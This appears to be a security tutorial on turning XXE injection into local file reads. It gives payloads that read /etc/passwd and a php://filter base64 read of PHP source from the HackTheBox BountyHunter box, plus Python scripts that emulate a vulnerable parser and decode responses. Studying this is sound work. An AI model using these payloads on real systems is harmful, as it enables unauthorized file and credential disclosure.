XXE to LFI


Last updated 2 years ago

To retrieve a file from the server's filesystem, the submitted XML is modified in two ways:

  • Add a DOCTYPE element that defines an external entity whose SYSTEM identifier is the path of the sensitive file.

  • Edit a data value that the application reflects in its response so that it references the defined external entity.

Suppose a shopping application checks the stock level of a product by submitting the following XML to the server:

<?xml version="1.0" encoding="UTF-8"?> 
<stockCheck><productId>381</productId></stockCheck>

We add a DOCTYPE element that declares the sensitive file as an external entity and reference that entity in place of the product ID:

<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE d0p [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

The DOCTYPE declares &xxe; as an external entity whose value is the contents of /etc/passwd, and the payload references that entity inside productId. When the backend parses the XML with external entity resolution enabled, it substitutes the file contents for the product ID, so the parser now believes /etc/passwd is the productId value.

Because the application reflects the productId value in its response, the file contents come back to us in that response.

Payload used: <!DOCTYPE d0p [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>.

  • Place it directly after the <?xml ?> declaration, and reference the entity inside productId with an ampersand and a trailing semicolon: &xxe;.

  • This only works when the response reflects the value we inject into. If nothing is reflected, the parser may still resolve the entity but we see no output; that is the blind case covered in the Blind XXE section.
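To see the mechanism end to end, here is an added example in Python; it is not code from the original page or from the BountyHunter box. It builds the payload above and feeds it to two parsers: a deliberately insecure one built on the standard library's expat bindings, with an ExternalEntityRefHandler that reads whatever file the DTD names (emulating the backend misconfiguration XXE relies on), and xml.etree.ElementTree, which never resolves external entities. The /etc/passwd stand-in is a constructed temporary file so the script runs offline; the element names come from the stockCheck request above.

```python
"""Added example (not from the original page): the XXE-to-LFI payload above,
parsed by a resolving parser and by one that refuses external entities."""
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path
from typing import Optional, Tuple
from urllib.parse import urlsplit
from urllib.request import url2pathname
from xml.parsers import expat

# Constructed stand-in for /etc/passwd so the demo never touches system files.
FAKE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "www-data:x:33:33::/var/www:/usr/sbin/nologin\n"
)


def build_xxe_payload(file_url: str) -> str:
    """The page's payload: DOCTYPE declares &xxe; as an external entity, then
    productId references it, so the file body lands where a product ID was."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE d0p [ <!ENTITY xxe SYSTEM "{file_url}"> ]>\n'
        "<stockCheck><productId>&xxe;</productId></stockCheck>"
    )


def vulnerable_parse(xml_text: str) -> str:
    """Emulates a backend whose parser fetches the SYSTEM URI named in the
    DTD (the misconfiguration XXE depends on). Returns productId's text."""
    parser = expat.ParserCreate()
    chunks, inside = [], [False]

    def start(name, _attrs):
        inside[0] = name == "productId"

    def end(_name):
        inside[0] = False

    def data(text):
        if inside[0]:
            chunks.append(text)

    def external_entity(context, _base, system_id, _public_id):
        # Insecure on purpose: read the file the DTD points at and feed it
        # back through a child parser, which is what a resolving parser does.
        path = url2pathname(urlsplit(system_id).path)
        child = parser.ExternalEntityParserCreate(context)
        child.Parse(Path(path).read_bytes(), True)
        return 1  # non-zero tells expat the entity was handled

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = data
    parser.ExternalEntityRefHandler = external_entity
    parser.Parse(xml_text, True)
    return "".join(chunks)


def safe_parse(xml_text: str) -> Optional[str]:
    """ElementTree never resolves external entities: the same payload raises
    ParseError ('undefined entity') instead of leaking the file."""
    try:
        return ET.fromstring(xml_text).findtext("productId")
    except ET.ParseError:
        return None


def demo() -> Tuple[str, Optional[str]]:
    """Write the constructed passwd file, attack both parsers, return results."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write(FAKE_PASSWD)
    payload = build_xxe_payload(Path(fh.name).as_uri())
    return vulnerable_parse(payload), safe_parse(payload)


if __name__ == "__main__":
    leaked, safe = demo()
    print("resolving parser returned productId =\n" + leaked)
    print("non-resolving parser returned productId =", safe)
```

Against a real target you would send build_xxe_payload("file:///etc/passwd") as the request body and read productId back out of the response; the second parser shows the check that stops the attack, which is simply not resolving external entities at all.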

PHP Wrappers - BountyHunter HTB

Suppose the website runs on a PHP backend and we have found hidden endpoints such as /db.php that we cannot read through the browser, because the server executes the PHP rather than returning its source. The XXE can still read the file, but raw PHP source contains <?php, <, and & characters that break the XML when the entity is expanded. Wrapping the read in a php://filter stream that base64-encodes the file avoids that; send the request through Burp and inspect the response:

<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>

Because the filter stream returns base64 instead of raw bytes, the entity expands to plain text that the parser accepts, and we get the expected output in the response. Decoding the base64 gives back the file; swapping the resource for the path of db.php reads the source of the hidden endpoint instead of its executed output.
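An added Python example, not code from the original page or the BountyHunter box, showing why the wrapper is needed and how to recover the source. It embeds a constructed db.php, shows what survives when that source is pulled into XML as raw text (the <?php ... ?> block is read as a processing instruction and discarded), then decodes a constructed response that echoes the base64 blob. The response element name is assumed; use whatever element reflects the product ID on the target.

```python
"""Added example (not from the original page): php://filter base64 read
through XXE, and decoding the result from the response."""
import base64
import re
import xml.etree.ElementTree as ET
from typing import Optional, Tuple

# Constructed PHP file standing in for the hidden /db.php endpoint.
FAKE_DB_PHP = (
    "<?php\n"
    '$dbuser = "app";\n'
    '$dbpass = "hunter2";\n'
    "if ($a < $b && $c) { }\n"
    "?>\n"
)


def build_php_filter_payload(resource: str) -> str:
    """The page's payload: the SYSTEM URI is a php://filter read of the
    resource, so PHP hands the parser base64 instead of raw source."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE replace [<!ENTITY xxe SYSTEM "
        f'"php://filter/convert.base64-encode/resource={resource}"> ]>\n'
        "<stockCheck><productId>&xxe;</productId></stockCheck>"
    )


def text_survives_as_xml(body: str) -> Optional[str]:
    """What a resolving parser keeps if the file is pulled in raw: '<?php ... ?>'
    is a processing instruction and is dropped, and any stray '<' or '&' makes
    the document ill-formed. Returns the surviving text, or None on ParseError."""
    try:
        return ET.fromstring(f"<productId>{body}</productId>").text
    except ET.ParseError:
        return None


def decode_filter_response(response_body: str) -> str:
    """Pull the base64 blob the application reflected and decode it."""
    match = re.search(r"[A-Za-z0-9+/=]{16,}", response_body)
    if not match:
        raise ValueError("no base64 blob in response")
    return base64.b64decode(match.group(0)).decode()


def demo() -> Tuple[Optional[str], str]:
    """Raw inclusion loses the source; the base64 read returns it intact."""
    # Constructed response: what the app would reflect after PHP base64-encoded
    # the file for the php://filter URI (no live target is involved).
    b64 = base64.b64encode(FAKE_DB_PHP.encode()).decode()
    response = f"<error>Invalid product ID: {b64}</error>"
    return text_survives_as_xml(FAKE_DB_PHP), decode_filter_response(response)


if __name__ == "__main__":
    print(build_php_filter_payload("db.php"))
    raw, decoded = demo()
    print("raw inclusion kept:", repr(raw))
    print("base64 read decoded to:\n" + decoded)
```

The same wrapper works for any file PHP can open, including /etc/passwd as in the payload above; the resource path is resolved by PHP, so a relative db.php is read from the executing script's working directory while an absolute path is read as given.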